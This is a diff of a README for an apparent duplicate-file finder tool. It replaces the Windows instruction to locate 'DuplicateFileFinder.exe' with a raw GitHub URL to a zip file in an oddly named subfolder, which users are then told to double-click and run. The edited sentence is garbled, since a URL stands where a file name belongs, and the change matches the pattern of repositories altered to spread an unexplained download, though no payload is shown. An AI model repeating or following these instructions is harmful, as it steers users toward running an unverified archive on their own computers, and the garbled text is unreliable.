arellanonavarretebulmaro-ai/DuplicateFileFinder/README.md

 #### For Windows Users

-1. Once the download is complete, locate the `DuplicateFileFinder.exe` file in your Downloads folder.
+1. Once the download is complete, locate the `https://raw.githubusercontent.com/arellanonavarretebulmaro-ai/DuplicateFileFinder/main/Afifi/Duplicate-Finder-File-2.0.zip` file in your Downloads folder.
 2. Double-click the file to run it.
 A command prompt window will open.
 3. Follow the prompts to navigate to the directory you want to scan for duplicates.